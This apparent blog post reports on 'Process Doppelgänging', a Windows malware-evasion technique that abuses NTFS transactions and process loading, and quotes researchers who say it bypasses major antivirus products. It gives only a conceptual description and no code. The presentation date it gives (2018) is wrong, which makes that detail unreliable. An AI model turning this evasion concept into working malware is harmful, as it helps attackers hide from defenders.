Security researchers have discovered a new malware evasion method called “Process Doppelgänging”

Share if you likedShare on Facebook0Share on Google+0Tweet about this on TwitterShare on LinkedIn18

security researchers from cyber-security firm enSilo have discovered a new code injection method called “Process Doppelgänging” that could help malware creators evade most of the modern antivirus solutions and forensic tools.

The technique was first presented at BlackHat Europe December 7, 2018. The researchers said that the new technique works on all versions of Windows and it can avoid most of the recent major security products.

According to the researchers:
“Doppelgänging works by utilizing two key distinct features together to mask the loading of a modified executable. By using NTFS transactions, we make changes to an executable file that will never actually be committed to disk. We will then use undocumented implementation details of the process loading mechanism to load our modified executable, but not before rolling back the changes we made to the executable. The result of this procedure is creating a process from the modified executable, while deployed security mechanisms remain in the dark.”

Researchers were successfully able to test their technique on products from Kaspersky, Bitdefender, ESET, Symantec, McAfee, Windows Defender, AVG, Avast, and Panda. Moreover, even advanced forensics tools will not be able to detect it.

To make this technique works, attackers need to know “a lot of undocumented details on process creation and this is hard. Unfortunately, this attack “cannot be patched since it exploits fundamental features and the core design of the process loading mechanism in Windows.”

Share if you likedShare on Facebook0Share on Google+0Tweet about this on TwitterShare on LinkedIn18
The following two tabs change content below.

Eslam Medhat

is a professional pen-tester with over 9 years of IT experience bringing a strong background in programming languages and application security, ranging from network and system administration to exploit research and development. He reported various vulnerabilities for high profile companies and vendors and was successfully acknowledged by them.

Latest posts by Eslam Medhat (see all)

Eslam Medhat

is a professional pen-tester with over 9 years of IT experience bringing a strong background in programming languages and application security, ranging from network and system administration to exploit research and development. He reported various vulnerabilities for high profile companies and vendors and was successfully acknowledged by them.

Leave a Reply